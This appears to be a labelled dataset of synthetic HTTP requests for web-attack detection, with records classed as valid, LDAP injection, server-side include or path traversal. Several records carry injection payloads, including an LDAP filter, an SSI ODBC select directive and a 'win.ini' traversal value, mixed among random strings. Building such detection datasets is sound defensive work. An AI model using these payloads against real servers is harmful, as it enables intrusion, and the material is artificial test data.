X-Serial-Number: 388092866322
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 250
Start - Id: 24448
class: Valid
GET /yLeDhbJc2lFk3/hma1ggl0qslEpa32o/aam9IaXxLAtfFjYh4q/jsJ6Vq3PCuiiMEGUeAD/aN3syc/Fsvaferefia5/FeGqHfZWoptzeD.gif? HTTP/1.1
Host: 159.22.9.170
Connection: nohatdd
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 96.17.46.82
Cookie: rBu=muhljbtoretpjsq;blta1=46596795
Cookie2: $Version="454"
Date: Thu, 29 Nov 07 15:31:05 CET
ETag: "L7.MGOCMhvEcaCCmm_j"
Expect: Efnggl
From: 5tcAy@3rnhcfaza.cz
If-Modified-Since: Wed, 10 Nov 04 18:45:43 CET
If-Unmodified-Since: Wed, 02 Dec 09 24:34:40 GMT
If-Match: *
If-None-Match: "vVDLhggHF-kJ2gVtys"
If-Range: Fri, 05 Aug 05 13:38:38 CET
Max-Forwards: 0432
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Basic aGVmc2pzaDppeWVwbnM=
Authorization: Digest realm
Range: -78
Referer: /ebPO/xet3ttV0/rnLpl/cwsA.png
TE: deflate;q=0.3,trailers
Trailer: Connection
User-Agent: in71sPySy http://www.s4aedc.uk
UA-CPU: MIPS
UA-Disp: 2319,894,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 257x1408
Via: sodt/0.3 www.tEt0syr.html, 6.1 www.ides.gif:15209, 5.4 www.dies.tiff
Transfer-Encoding: gzip
Upgrade: I3r8es/8.7
Warning: 838 www.iuUqaua.png:81783 "jeoeOeEehrcia6tshi" "Mon, 12 Nov 07 12:17:37 GMT"
X-Forwarded-For: 252.30.225.56
X-Serial-Number: 782387
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24448
Start - Id: 14899
class: Valid
GET /sukHBkMuU/zsnEadBlE/rcdstlc2sbgyi/e70oeehereEroe/alisdcokoymsh3iadnt/cLXea/o4lUkMeTVOc9P2Bjc55Y/h@4PTwtZ-5TcfMhtt-u/aoyQvB40ti/txfa.tiff? HTTP/1.1
Host: www.Nkenooye8T.org
Connection: acfA
Accept: text/xml;q=0.1, application/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: hniTN=cis
Client-ip: 181.203.41.231
Cookie: ipaens=cYautoexec8\saee
Cookie2: $Version="66"
Date: Tue, 26 Oct 04 01:22:32 UTC
ETag: "0Q.LZrhYrS2515GT-RM"
Expect: sT1i=7oiuslK;krpi
From: 09ujate@anp8ehmeue.biz
If-Modified-Since: Tue, 01 Jan 08 22:26:57 CET
If-Unmodified-Since: Tue, 17 Aug 04 11:19:12 GMT
If-Match: "bENL25l1IoohnsMZ-DJr"
If-None-Match: "7H4uxINNEbvWdQyQyF"
If-Range: "ea11WasSCkzsVvjI"
Max-Forwards: 8
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic aWVzYWc6NnhzNnlsb3M=
Authorization: 8arok qv5onc=oOsc
Range: 614-,0-6202
Referer: /xritfew/uaerge/c5en/nayuc.gif
TE: gzip;q=0.2,gzip
Trailer: Cache-Control
User-Agent: Mozilla/1.5 (X11; U; Open BSD i586 6.1; ll-8d; rv:1.1.4) Gecko/76216231
UA-CPU: StrongARM
UA-Disp: 3105,545,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6967x560
Via: 4.5 109.192.188.223, FTP/0.7 www.a1gsWe.css, 5.2 168.254.65.86
Transfer-Encoding: enoltt; mlDint=nfjssah
Upgrade: ed3tT/7.9, 3Ifeie/2.1, etw/3.8, thenvr/4.1
Warning: 225 184.210.143.62:77965 "ecfsd0heehezcle" "Sat, 24 Feb 07 14:16:26 UTC"
X-Forwarded-For: 123.153.218.172
X-Serial-Number: 572302445496
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14899
Start - Id: 37885
class: LdapInjection
GET /vHtelnetiframe_NL.AQt/g99ciK/@Wwp-VS/4GPAAJ4f/m7Krek@n/2E.0/eMwdrOH/oxEDa/tSl9YxOaONthX__k6/eiiu3eIdhmtc5c/o5Ux.css?MldGe=tsdirca&izaa=0&@KUftpAeu=nil%29%28%26%28objectClass+%3D+++2hnp*%29&oybatheh6ee=atselect+kform88&tshhrdwroet=56&ttNOmyo=avOaq HTTP/1.0
Host: www.oqsq.com
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: iso-8859-2;q=0.5, koi8-r;q=0.3, euc-jp;q=0.5
Accept-Encoding: *;q=0.6
Accept-Language: tnh-mnfa8bd, i-esg
Cache-Control: no-store
Client-ip: 209.154.70.239
Cookie: 7Dr=nm;ejL1XZ=028;mr=1;yqoIc=tVuhl1Maz5i;eb2dfrds9Es=50
Cookie2: $Version="4"
Date: Fri, 27 Oct 06 05:43:42 CET
ETag: W/"pNxix-WiJNQLVltQ"
Expect: ooauyOdi
From: pyeere9e@rgid7rnosp.be
If-Modified-Since: Wed, 14 Sep 05 03:41:56 UTC
If-Unmodified-Since: Wed, 21 Feb 07 06:54:15 GMT
If-Match: *
If-None-Match: "4QttuDTIEQQlu6Uw"
If-Range: Sat, 13 Sep 08 06:11:14 CET
Max-Forwards: 0
MIME-Version: 6.3
Pragma: Nrl='6mC'
Proxy-Authorization: Basic ZXNtaGFTOmF4dWVl
Authorization: an5hh ctrssarp=pm9b6n
Range: 41-534098,-55
Referer: http://www.Sl3cA.fr/iSeohS0/2wlap/tsiah.png
TE: gzip
Trailer: If-Modified-Since
User-Agent: nnms/4.9.6
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: 1.8 www.esndtpon.htm, hot/6.0 137.81.47.31, 2.0 191.59.247.88:3250
Transfer-Encoding: gzip
Upgrade: 82r/8.3, ehi/8.7
Warning: 941 www.iehcba.gif:913 "elrrSd" 
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 300384
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37885
Start - Id: 29227
class: Valid
GET /include2/rGaAeurZXQfq@3q/urtt1cNereilzeelnrlm/jfHy3QC/ogroup bysamRN8vbscript@vbscriptgFwinnt9hs/4WApLek3h/-dYoBoG6Fobject4position9D/iAelnhOrd3e/acceptaHxqw.betweenOs5g/ajL8DJcHHxYFlv2/j4nqybZbgNW./h1r_IqAxv1zjqzqnvnNf.htm?etezDnt9onNsKO=xr5tM&wf8rEm=1862&sboqKswRErmscdj=5oC%40HQ&lsfAY=O7dedLytoooLrbst7u&3es2ehnyaU=eaorb&annA=r9hatykYP8s%3Bfu&siSnhi8=u&mnysdeil0chY=2hglFh4CFh&Vvafr64W=6342&1hirorZ=e3tereow6&isva=46938482&0aNQWhome-=hLaArcne&tiaseLdraNHlmxt=blXs8&x78=rs&t5tialteoxwHtwo=fnoe9riilxq HTTP/1.0
Host: www.IUOJsltee.ch
Connection: 6BSliesd
Accept: image/jpeg, audio/basic
Accept-Charset: cp-932, cp-932, iso-8859-2;q=0.1, isiri-3342
Accept-Encoding: compress;q=0.8, deflate;q=0.5, compress;q=0.2
Accept-Language: 2llea-o, u-tla8al;q=0.5, y-b9siu
Cache-Control: no-cache
Client-ip: 24.91.199.11
Cookie: ehtudDtl=select nA;anutPbh=rnpstiiO;td=qPmDs72Ph;ytor=3OAEvYH
Cookie2: $Version="37"
Date: Tue, 22 Jun 04 18:57:23 GMT
ETag: W/"2PApzTHpaqIJm8_KQ@@"
Expect: 100-continue
From: pfeb@exzls2nagt.biz
If-Modified-Since: Sun, 29 Nov 09 21:56:02 CET
If-Unmodified-Since: Wed, 21 Apr 04 19:56:33 UTC
If-Match: "UUd.6C-aXcD286CZ3YQ"
If-None-Match: "4wWhqD7GzuK0Hn_of99"
If-Range: *
Max-Forwards: 506
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest qop=deeie
Authorization: Digest cnonce="nsUodO"
Range: -2
Referer: http://dvtae0.fr/ftwe.txt
TE: gzip;q=0.2,chunked;q=0.7
Trailer: Accept-Charset
User-Agent: Mozilla/6.3 (compatible; Konqueror/0.7; Linux i586; iSpnOsd7N; ndluund7)
UA-CPU: PowerPC
UA-Disp: 323,9503,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 200x896
Via: 1.9 51.36.26.205, FTP/4.6 190.194.103.247
Transfer-Encoding: identity
Upgrade: meof/2.8, noaa/9.9, smaese/4.8
Warning: 332 146.198.222.127 "sgnyiw" 
X-Forwarded-For: 232.31.166.192
X-Serial-Number: 417531274115
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29227
Start - Id: 27555
class: Valid
GET /r0/aiNkenlsgSnoiRnetr/hqcYT4Yi_ynFnZZUtjRF/fri/wF36Uh.pl?Sroeotl=01&t9ei4gtdc=b1IL.5FSP&q8eeu=aPv&yednebaa=5&formpositioni4N2.K2=l%26ssEahtpassgU%24&splttasfe=6170322 HTTP/1.1
Host: www.oSmb.net:80
Connection: ostltfo
Accept: video/*;q=0.5, text/*, video/*;q=0.0
Accept-Charset: x-mac-cyrillic
Accept-Encoding: *;q=0.8
Accept-Language: heeo-a3et1A
Cache-Control: no-cache
Client-ip: 43.118.104.43
Cookie: etljx=3a7UmmtbOL;n6errjs=copye;en=aZ1O-xnJwnd;GLLN02A=76382;ruoavc9btpt1bw=npe;H1A0fl=eiaana >uip0dmner ne
Cookie2: $Version="6"
Date: Tue, 05 Aug 08 04:53:32 CET
ETag: "9ZCxqi6vbsm4MmPpj"
Expect: shete=A2xRIa9
From: rn1otcn@tde51wqd.st
If-Modified-Since: Sun, 26 Jun 05 08:09:05 GMT
If-Unmodified-Since: Sun, 05 Oct 08 21:35:42 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 31 May 04 01:20:46 CET
Max-Forwards: 9
MIME-Version: 2.1
Pragma: eyreea='xgroei'
Proxy-Authorization: Basic aWFvc2lmOmVlaGFzMw==
Authorization: Digest opaque="lesn"
Range: 12108-0448,63541-,88678-33
Referer: http://www.oiuxt.gov/ighelew/mUtiPsig/eegio/oxeebeee.msf
TE: trailers,trailers,chunked
Trailer: Max-Forwards
User-Agent: djEBkiwwt http://www.b3iO.de
UA-CPU: StrongARM
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 412x989
Via: qnE/7.7 30.127.248.193, 0.6 68.50.160.193
Transfer-Encoding: compress
Upgrade: tqtyi/0.3, 5aftHf/0.4, ifhtn/3.3, ntdsF/5.0
Warning: 039 www.arkr.tiff:90 "Gazauhqtpdrsdhhh" "Sat, 20 Feb 10 16:03:50 GMT"
X-Forwarded-For: 49.154.202.141
X-Serial-Number: 76901665181608584434
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 27555
Start - Id: 23511
class: Valid
GET /@5BWpU@qLFXgroup by/dtPncRynEsx3-PzE/osbcrete/4aM9eX.shtml? HTTP/1.1
Host: 151.96.11.92
Connection: keep-alive
Accept: image/*, image/gif;q=0.7
Accept-Charset: utf-8, windows-1255;q=0.6, euc-kr;q=0.9, x-mac-arabic;q=0.6
Accept-Encoding: *
Accept-Language: sceyrmm-eThe8gh, a-rwAu;q=0.6, lfonm-issA7, wo-Ch;q=0.9, utpahe-mlriintt
Cache-Control: no-cache
Client-ip: 223.207.76.118
Cookie: rs1yZu8fdETobject=e;lhr=sb0rorh8;dvpDJVHyAmG=i-noarU;irghs9=hi6ni7(;tlal=8005
Cookie2: $Version="0"
Date: Thu, 12 Jul 07 10:18:10 UTC
ETag: "WxO.5LN1c1XuAsPlzuvP"
Expect: s4Ffghrl
From: ltnesme@hsentase.it
If-Modified-Since: Sat, 19 Nov 05 05:29:43 UTC
If-Unmodified-Since: Mon, 23 May 05 24:07:58 UTC
If-Match: *
If-None-Match: "f91eWlmGkrcd6os1uHQY"
If-Range: "90EI5iTxwUh_Lpu-GQvd"
Max-Forwards: 1839
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic VHJzRDZtZTpzN2xldGl3cg==
Authorization: NTLM d2ljU2UybHNpZWFzaXNlVDJIcmVtaWV1eGh0b3BldDNtY24waW12a25h
Range: 90-,49-617
Referer: http://ger8phOo.ch/t9xosice.txt
TE: gzip;q=0.2
Trailer: Trailer
User-Agent: yKzeHN/9.0.5
UA-CPU: x86
UA-Disp: 987,566,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4426x0282
Via: HTTP/9.5 167.65.8.208:72
Transfer-Encoding: zEnrr
Upgrade: Odqe/8.0, Phrs/0.8, i83hqn/9.8, 6d1a/9.7, joi/4.4
Warning: 316 www.deemx.htm:8305 "btsydnansow" 
X-Forwarded-For: 238.108.237.191
X-Serial-Number: 467341
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23511
Start - Id: 20245
class: Valid
GET /aeaosiT4wte/swboEPMQwi4zEb2l3-7/gl8lGLU4/ee7nncz4bmni/cTtmposam/i8redmRoite/iqRlH1ZO/uniidnsonoui3IVghau/097Cn-pbvSjF-/7stdinm5ORfXjTG.js?f2NnodeXaIZ7M=dwewzua&EyGhTsm1tita=imhtaar%3Fo&ailiae5t=3971806265&brdodtWluo=1&6OTgies=tcdmN0&eU3tatmuiaa5c4=foFnriMh&oowtecessnee=lto&eahtdyaaeswN54=fouf5rmcigd&sltb0eBbpn=3311747968&imthpoqeIEyw=74418&RtXrnt=na61Do%7Erwwijiwget&mSSwDselectIlYH=1639&Xran=420 HTTP/1.0
Host: 252.23.120.128
Connection: 2llub
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.8, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 160.93.226.49
Cookie: mtthlFeOtndA=oons7HOewae8opa
Cookie2: $Version="38"
Date: Fri, 27 Aug 04 13:25:31 UTC
ETag: "onTczYYYLkfLSl06wg"
Expect: rtd6qe7=sudec4t
From: netyzah@uidoqet.be
If-Modified-Since: Fri, 17 Aug 07 12:15:01 UTC
If-Unmodified-Since: Sat, 01 May 04 09:33:29 CET
If-Match: *
If-None-Match: "HSjSmFl6lv1@RH_r"
If-Range: "obg5w@Z3rPG5GfNma"
Max-Forwards: 9617
MIME-Version: 7.7
Pragma: nLviyo=A
Proxy-Authorization: Digest nc=DB32fAe6
Authorization: Digest username="9otn"
Range: 58959-,-0873,-2
Referer: http://a2eniwsr.be/tatsopx/3sicaaa/lm5t/orotl/tyjhehas.sh
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/8.3 (Windows; U; Win 9x 4.7; rx-gH; rv:3.4.6) Gecko/08456617
UA-CPU: MIPS
UA-Disp: 1660,743,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 566x725
Via: FTP/3.3 www.zGvtAe.jpg, 3.9 167.152.84.104
Transfer-Encoding: cdaco
Upgrade: 6Nl/9.6, iln/2.9
Warning: 407 www.lti8nm6y.gif "4cis0daFde" 
X-Forwarded-For: 53.85.23.141
X-Serial-Number: 554046996797250
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 20245
Start - Id: 34585
class: Valid
PUT /otEI/itten0mnmri8CSrtn6ai/Ebihybith/aesaA/0ZtovFYUTl3a/nE2dG.DcU/yWZHIaBa/@uDuK6/nXCPqjufTLyBYS/7Lxip_av/as5.css? HTTP/1.1
Content-Length: 137
Content-Language: dN,Laainda,Ltaaafe
Content-Encoding: identity
Content-Location: /Aueksk/4eqxeedb/uetatio/x9an/ttarDrs.mpeg
Content-MD5: bWlhZUVsZWhvUm82YWN0NQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 22 Nov 04 24:02:48 UTC
Last-Modified: Sun, 01 May 05 03:47:22 CET
Host: www.l4wsapft.net
Connection: h9sno
Accept: image/png, audio/basic;q=0.3, audio/basic
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 78.78.230.172
Cookie: rfsi2viAaSo=erela;jwteMtoWo38nddr=o&eewce:zhtelnetsTut&u;mmE1HEZwD=tvhtg;0cc=aqNi7iH4_mF.;rmex7Bs=h9eim2tesxo2;tqtnkhaEtso1=h8zaUY
Cookie2: $Version="5"
Date: Sun, 04 Jun 06 10:44:12 GMT
ETag: W/"KPKlUFLo-_mo_Mefai"
Expect: 100-continue
From: Oaodnbea@frlfa.ch
If-Modified-Since: Fri, 09 Apr 04 17:50:16 CET
If-Unmodified-Since: Mon, 25 Jan 10 19:46:03 CET
If-Match: *
If-None-Match: "VKTy9QHX2rYTYjO"
If-Range: Mon, 18 Jan 10 07:16:19 UTC
Max-Forwards: 16
MIME-Version: 1.5
Pragma: 7ys='tw0'
Proxy-Authorization: aueh h6ywlel=day6os
Authorization: Digest opaque="aerr"
Range: 1867-,-2727
Referer: /lGirLul.shtml
TE: gzip
Trailer: Date
User-Agent: kqaolICsrilpne
UA-CPU: PowerPC
UA-Disp: 448,619,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 212x4185
Via: FTP/8.3 20.209.187.254, 2.0 www.tdnae.html
Transfer-Encoding: gzip
Upgrade: Qodwe/1.4, 5thx7/5.2, EeTnts/6.6
Warning: 167 www.rhqsT.css "8mTr" 
X-Forwarded-For: 7.90.1.179
X-Serial-Number: 8498191575866
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nSshrhi=tabetweenettl&dninyJ=daOlhjrascript&iw=dnsld6d@\w60nrh&soe5w7oi=512982&2L60Bo2nmD=x09j 7Nyp/processing-instructionejgn 7ano

End - Id: 34585
Start - Id: 19081
class: Valid
GET /h.IfDQFB/formxrdo/aeEAT7/a_Qc/mpe8HXsNaB7qTbuGnljh/cKg6FL9ylHHU/rcx8dsmacskafeuhE7A/uRsnuOfb/ispjl/sevnAeAocszaehlsic2a/mtdseewjhdizwwDpUOe.php4?1eiusUscia=ei0Edtan0jrsnt&r0emrsuaaodau=0997&connect0okGtTxgHL=cj2%40gYX&mn=%2B%28l6S HTTP/1.1
Host: 12.71.40.142
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-2022-kr;q=0.1, windows-1251, cp-950, euc-kr;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 222.183.198.147
Cookie: stalz=335;7ra=ym6pvI@4;pees=4431;red=l2eIM;.QxhtaccesIPtNolut=pmenitvbscriptnwget;ensnteeb=313493266
Cookie2: $Version="03"
Date: Sat, 27 Dec 08 16:51:28 GMT
ETag: W/"ybTiqqPUXJhv01KIDA9"
Expect: o1athi=doihD;aron=gyst
From: jgqen@7tosiu.st
If-Modified-Since: Tue, 16 Jun 09 14:39:26 GMT
If-Unmodified-Since: Wed, 12 Jan 05 01:54:20 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 11 Jun 06 19:24:49 GMT
Max-Forwards: 353
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: NTLM NHBwdDFldGVlaXQxbm1nb3J0SXRobnlubnRyczV0ckFobmhlYQ==
Authorization: scih flee=eaareie
Range: -98,0008-41,92-
Referer: http://3ttrtd8m.be/nntmzT/Ac8sg.shtml
TE: trailers
Trailer: Date
User-Agent: q_mSiR3-W6 http://www.YBqn.uk
UA-CPU: PowerPC
UA-Disp: 603,8155,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 019x039
Via: HTTP/1.9 www.hpaNuub.gif, 2.1 102.122.7.12, n3edzr/2.4 88.74.187.240
Transfer-Encoding: deflate
Upgrade: mTec5/5.9, iRo/8.2, 5e5e/7.4
Warning: 769 www.ynfoTewU.png "tyneuSih9ho" 
X-Forwarded-For: 203.182.207.188
X-Serial-Number: 594077
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19081
Start - Id: 6941
class: Valid
POST /oOonesidd1ndbsitpsoe/vte/CaedJSaueetseinere/fR5MxB_Fn4HXy/ean9etE7n2aS/YJ/06Kpiha6S/PmetaqW7Nm-hUM_zwk.css? HTTP/1.1
Content-Length: 95
Content-Language: ic1c
Content-Encoding: compress
Content-Location: http://nbjhjdns.uk/mniaLs/pdnd/enrar0t.jsp
Content-MD5: bHVyd3FlbWFvdGllNGdwSA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Nov 06 13:53:45 UTC
Last-Modified: Sat, 15 Apr 06 22:07:21 GMT
Host: www.uelsePcers.uk
Connection: Gtucdai
Accept: video/mpeg, video/*
Accept-Charset: x-mac-japanese
Accept-Encoding: identity;q=0.8, gzip;q=0.9, deflate;q=0.8, identity
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 246.212.231.208
Cookie: datergpde=afv7E
Cookie2: $Version="44"
Date: Tue, 01 Jul 08 15:35:40 CET
ETag: "ADkf8ih4MdPOWn2@W"
Expect: lilmr
From: 9tasgo@r6haat.org
If-Modified-Since: Sat, 10 Jan 04 06:03:25 UTC
If-Unmodified-Since: Wed, 02 Apr 08 02:09:36 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 03 Jun 05 12:42:11 CET
Max-Forwards: 99
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="1sg3"
Authorization: NTLM eXJubTJlOHpwb24xRU5hbjlvYWFuZWFzaXRlZGFvdXVlSHRjZGNzeA==
Range: -35,310954-4,-65030
Referer: /eeesivN/mite/mT0uns/wncv/DP5loo.shtml
TE: chunked,trailers
Trailer: From
User-Agent: Mozilla/8.0 (X11; U; Solaris 3.0; 9a-tm; rv:3.9.5) Gecko/66849876
UA-CPU: PowerPC
UA-Disp: 7932,0076,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 751x6296
Via: HTTP/4.1 8.22.237.188, 8.9 76.14.118.29:46881, 2.2 135.46.68.22
Transfer-Encoding: 2foooO
Upgrade: nsobNi/4.6
Warning: 250 59.47.69.234 "dllcxoqieenmhiSaaaes" 
X-Forwarded-For: 26.141.211.211
X-Serial-Number: 95729667
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eixp9t0tenutnL='oeLdiv&.UT5kidimgP=evoecspo8%Oumme5i&iw2oIhe=m7n &fntrmeo=aeq&ASSbW2=ttm me

End - Id: 6941
Start - Id: 40947
class: SSI
GET /m2HO/tslAfeeH/3ti0Ct/A1sSc59netcat7/nQ9xO_-7WiV-ZYqaJPy/IieiktNaglto/n8Ef4kdKGY5wcW/Patobdes5eLsm/dk5uLEjrwtsbb/iaiiggfimisa/0fconnectTv@VqunionOM/iUA@JS83--Ff.45675z.jpg?rkgibrysolp6sie=%28Ebn%25u%3Bssselectlrsyre&gdnh=telnetiS&2s=0shs%7EjekjEEbe&ituc40tiott4db=+p&oeb6sy=lni+gszSsuL%289&_C7hohOautoexec=%3C%21--+%23odbc++++connect%3D%22see%2CImo%2Cbtsy%22+++++statement%3D%22select+++++*+from+++ho4ts%22--%3E&pbCel0o46ai=055 HTTP/1.0
Host: 42.194.176.180
Connection: close
Accept: image/gif, image/gif;q=0.3, audio/*
Accept-Charset: *;q=0.2
Accept-Encoding: gzip
Accept-Language: cR-ut
Cache-Control: no-store
Cookie2: $Version="7"
Date: Sat, 23 Jun 07 17:17:51 GMT
Expect: 100-continue
If-Modified-Since: Sat, 15 Dec 07 10:03:11 UTC
If-Unmodified-Since: Wed, 30 Nov 05 15:23:46 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 20 Sep 07 24:39:09 UTC
Proxy-Authorization: Digest uri=http://pubtmS.fr/cUdevTmc/neroi2.doc
Referer: http://EtnPo.st/ldDGycsO/shtdsai2/ktS61m/fEu7no.jsp
TE: trailers,chunked;q=0.4
User-Agent: Mozilla/9.6 (Windows; U; Windows NT 0.1; hl-bn; rv:7.2.7) Gecko/15287133
UA-Color: color16
Via: FTP/5.2 200.144.211.204, 7.8 www.Bwda1tsm.gif:4
Transfer-Encoding: deflate

null

End - Id: 40947
Start - Id: 17149
class: Valid
GET /s19cirtoeT/HIbodycmdaPbaccess_log.jsp?OJUfo=eoeretdeuEess&0dqDQn5clS=nc4&ttreodutihtt=5555 HTTP/1.0
Host: 223.153.196.236
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 135.104.246.43
Cookie: epetm16=eHp>escripttdr;ecrSln7aietMrc=qJ0.DNRc;he8oeohnh3neAl=t.6fLA;yqo=tdnsslnrioXhm;aaohat=p4yGWX;a0sqoce60=htegeigeo3ne'S
Cookie2: $Version="71"
Date: Thu, 19 Aug 04 22:40:02 CET
ETag: "Gro2HZyrngc6QuB6f4"
Expect: yuoeintc
From: gcEsmc@smae.st
If-Modified-Since: Thu, 13 Mar 08 14:22:08 CET
If-Unmodified-Since: Sat, 04 Feb 06 19:07:10 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4676
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWw1YzF0U1RkcmVlWnB5aGhpbzJOZXdQbGlkU29ucm9s
Authorization: Basic dHNuUnM6YXJvM3N3ag==
Range: 6398-,1074-5081,99-87016
Referer: /cnmnpDeu/rbko/szMo.ace
TE: trailers,trailers,gzip
Trailer: Accept
User-Agent: 4-u9hk2 http://www.e8uueanI.st
UA-CPU: StrongARM
UA-Disp: 817,8711,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0887x1006
Via: 7.2 196.192.108.132:89, 4.9 www.fareeEO.html
Transfer-Encoding: gzip
Upgrade: wbigqt/6.4, hv08se/7.5, ses/3.0, iei/9.4, n6vl/4.7
Warning: 884 66.52.11.38 "buetRO9tneeajg1yc" 
X-Forwarded-For: 125.81.27.179
X-Serial-Number: 92445
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17149
Start - Id: 19359
class: Valid
GET /ocA6Aoeosetvad1olHau/dhxKTrtKt6/NXNe/ncient5ePeialS/@zm/aCgw1SmAyJXm4xTj/CeZTirHn4cOe2connect/iNTU0QUPAbq/gKuD/Eele5ac/eytr7AalrasY9hads/uunRcatd.mspx?egT=+dEet%3Eis6oe3rea1f&arwestsnnWP=72110&vhsed=sgsTsfknniE1 HTTP/1.0
Host: www.le1otte.be
Connection: tnkjn
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 60.233.136.142
Cookie: smrtmpT8ra5Ah=jruejeicsZioll;eu=zele;zogiht1aii3Hns=k;Zh9catB6=scriptxde
Cookie2: $Version="883"
Date: Sun, 18 Nov 07 01:31:29 GMT
ETag: W/"8oxsEbtueYBtAIGzt"
Expect: 100-continue
From: eNaay@rjRtebre.biz
If-Modified-Since: Thu, 25 Nov 04 11:48:37 CET
If-Unmodified-Since: Mon, 06 Jul 09 08:06:28 UTC
If-Match: *
If-None-Match: "DUao..GiQVFY20BypP"
If-Range: Wed, 15 Oct 08 07:29:10 UTC
Max-Forwards: 7032
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM NXBucnN0dWlybmV0SGlyYW9lY3JtamVkeWNpbXR5bGRpT0dvMkxSZWVrb2Vh
Authorization: NTLM eXBkbmpzM3RybXJldWh0aWlub3R1d1JyZW5zZmFvZTB5YmVkdA==
Range: 9977-630140
Referer: http://www.9uejci.ch/lwdgMAas/n3ueq/mohstfC/rechXtrs.cfm
TE: trailers,trailers,chunked
Trailer: If-Match
User-Agent: Mozilla/3.1 (compatible; MSIE 3.5; Linux i386; emImi; eMthEho; hT2ihele)
UA-CPU: Sparc
UA-Disp: 674,7588,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 810x5301
Via: 8.2 www.ieg4ttea.png, 0.5 98.22.169.197, HTTP/0.0 1.232.134.168
Transfer-Encoding: da5PrW; thc3=iyc1saae
Upgrade: 0sO/7.7
Warning: 825 www.3Eothdos.gif:29220 "iow9t" 
X-Forwarded-For: 106.216.193.253
X-Serial-Number: 04731684394484360206
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19359
Start - Id: 36188
class: PathTransversal
PUT /eei/os2leNMarsoFba0htP/RpSread5taedo/yTswYUrM/jW@YQ7dNE8y_4Wm/mTuI2x2/m1diahIhmeso0.asp? HTTP/1.1
Content-Length: 91
Content-Language: 2ssdy,Mrj
Content-Encoding: compress
Content-Location: /VAtgcc/weyFbr.jsp
Content-MD5: c3M1aTFieG9tb3R1NHRubQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 May 06 08:36:09 UTC
Last-Modified: Mon, 10 Aug 09 04:24:06 CET
Host: 219.160.207.76
Connection: dtnr1Ntl
Accept: */*;q=0.8
Accept-Charset: x-mac-roman, big5, macintosh, windows-1250
Accept-Encoding: compress, identity, deflate
Accept-Language: n:\\WINNT\\win.ini
Cache-Control: no-transform
Client-ip: 220.235.100.136
Cookie: noin6ohyi2=asTqi;sn=aeesuiwr1nsfo;kpq2=hi;VN4Joptc3U=BiresrdeIwttot;eedO=7319
Date: Mon, 12 Feb 07 12:48:33 UTC
ETag: "eGwBaRA24wjBRT_nUC"
